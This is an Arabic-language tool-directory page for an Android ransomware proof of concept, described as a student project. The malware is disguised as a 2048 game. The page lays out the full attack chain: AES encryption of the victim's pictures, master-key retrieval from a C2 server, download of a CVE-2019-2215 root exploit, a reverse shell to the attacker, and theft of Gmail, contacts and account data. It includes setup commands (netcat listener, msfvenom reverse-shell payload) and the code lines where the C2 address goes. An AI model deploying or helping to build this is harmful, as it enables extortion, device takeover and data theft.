Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Rootsmart-v2.0 — تطوير برامج فدية لأندرويد - تشفير AES256 + CVE-2019-2215 (شل عكسية لجذر النظام) + تسريب البيانات | Kitploit
أدوات/GitHubGitHub/nicchongwb/rootsmart-v2.0
أمان أندرويدتصعيد الامتيازاتأدوات التشفير/فك التشفيرالاستغلالالحركة الجانبيةتسريب البياناتتحليل البرمجيات الخبيثةأمن الجوالالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتArchived
11منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubnicchongwb/rootsmart-v2.0

Rootsmart-v2.0

تطوير برامج فدية لأندرويد - تشفير AES256 + CVE-2019-2215 (شل عكسية لجذر النظام) + تسريب البيانات

عرض المستودع

Rootsmart 2.0 مع cve-2019-2215 + برنامج الفدية

إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية فقط. يستخدم هذا المشروع كودًا من rkshrksh/2048-Game و kangtastic/cve-2019-2215.


وصف المشروع

هذا المشروع هو جزء من وحدة أمن الأجهزة المحمولة في معهد سنغافورة للتكنولوجيا. تم إنجاز المشروع في غضون 6 أسابيع، وكان الهدف منه تطوير تطبيق أندرويد خبيث. من خلال ذلك، ساعدنا في تعلم كيفية تنفيذ آليات الأمان في نظام أندرويد وكيف يمكننا تطبيق OWASP Mobile Top 10:2017 M8 - العبث بالكود.

المشروع هو إثبات مفهوم لعرض برنامج فدية مكتوب خصيصًا يستخدم تشفير AES، وتسليح ثغرة cve-2019-2215، بالإضافة إلى سرقة البيانات من الجهاز المصاب.

تم اختباره على Android 10 و Google Pixel 2 XL.

root@kitploit:~
├── 2048-Game 					// مجلد مشروع أندرويد
├── 2048-keystore				// مخزن مفاتيح الاختبار
├── cve-2019-2215				// نسخة معدلة من cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// دليل خادم التحميل
│	├── cve-2019-2215			// محتويات shells.zip قبل الضغط
│	├── dropper_server.py		// برنامج خادم التحميل
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// ملف ثنائي Netcat لنظام ويندوز - لمستمع الصدفة العكسية
│	├── requirements.txt
│	├── shells.zip  			// shells.zip المستضافة في جذر خادم التحميل
│	└── venv
└── test_images    				// صور اختبار لسهولة الدفع عبر adb push <image.ext> /sdcard/Pictures
ناقل الهجوم:
  1. تثبيت التطبيق وتشغيله ومنح الأذونات
  2. سيقوم برنامج الفدية بتشفير جميع الملفات في /sdcard/Pictures باستخدام AES
  3. سيتم تشفير كل ملف بمفتاح عشوائي
  4. سيتم تخزين المفاتيح في /sdcard/keys.json حيث يكون كل زوج مفتاح:قيمة هو مسار_الملف:المفتاح
  5. إجراء طلب GET إلى خادم C2 /get_mk لاسترداد MasterKey و VictimID في نص الاستجابة
  6. المفتاح الرئيسي سيقوم بتشفير keys.json، وسيتم تخزين VictimID في /sdcard/victimID.txt
  7. سيقوم التطبيق بتنزيل shells.zip وفك ضغط المحتويات
  8. تنفيذ ملف cve-2019-2215 الثنائي من المحتويات المفكوكة
  9. سيتم إنشاء عملية صدفة جذرية وتشغيل install.sh من المحتويات المفكوكة
  10. سيقوم install.sh بتنفيذ rs.elf من المحتويات المفكوكة لإرسال اتصال عكسي إلى خادم الهجوم
  11. سيقوم التطبيق بسرقة البريد الإلكتروني لجيميل، ومعلومات حساب المستخدم، وجهات الاتصال من الجهاز.
العرض التوضيحي

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


إعداد C2 (القيادة والتحكم)

لهذا الاختبار، تأكد من أن هاتف الضحية وخادم C2 موجودان في نفس الشبكة الفرعية (وإلا قم باستضافة خادم C2 على الإنترنت العام). هناك 3 نقاط نهاية لخادم C2 يمكن العثور عليها في dropper/dropper_server.py:

  1. /process_command - GET لتنزيل shells.zip وتشغيل ثغرة الجذر cve-2019-2215
  2. /get_mk - GET للحصول على زوج المفتاح victimID:masterkey لتشفير /sdcard/keys.json
  3. /postData - POST لاستقبال البريد الإلكتروني المسروق، جهات الاتصال، معلومات الحساب
خادم الصدفة العكسية
root@kitploit:~
nc -lvnp 1337 # من الأفضل أن يكون هذا بنفس IP الخاص بخادم التحميل
خادم التحميل
root@kitploit:~
# إنشاء حمولة rs.elf
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<IP المهاجم> LPORT=<منفذ المهاجم> -f elf > rs.elf

# من الأفضل تشغيل Flask على ويندوز إذا كان WSL لا يقوم بتحويل منفذ localhost إلى مضيف ويندوز
cd dropper
python3 -m venv venv # إنشاء بيئة افتراضية

# تفعيل البيئة الافتراضية
. venv/bin/activate # لينكس
venv\Scripts\activate.bat # ويندوز
pip install -r requirements.txt --upgrade pip # تأكد من أن شل المضيف هو root/Administrator

# تشغيل خادم C2
python3 dropper_server.py # WSL
python dropper_server.py # ويندوز

shells.zip في /dropper

  1. اذهب إلى مجلد dropper/cve-2019-2215
  2. بعد إنشاء rs.elf، قم بضغط rs.elf + cve-2019-2215, install.sh
  3. أعد تسمية ملف zip إلى shells.zip
  4. انقل shells.zip إلى /dropper

تعديل ما يلي قبل تجميع APK

فئات Java

root@kitploit:~
// الملف : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// قم بتغيير IP والمنفذ وفقًا لـ IP ومنفذ خادم التحميل
String URL = "http://192.168.157.73:8080/process_command"; // السطر 19

// الملف : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// قم بتغيير IP والمنفذ وفقًا لـ IP ومنفذ خادم التحميل
String URL = "http://192.168.157.73:8080/get_mk"; // السطر 45

// الملف : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// قم بتغيير IP والمنفذ وفقًا لـ IP ومنفذ خادم التحميل
String urlString = "http://192.168.157.73:8080/postData"; // السطر 32
تنزيل الأداة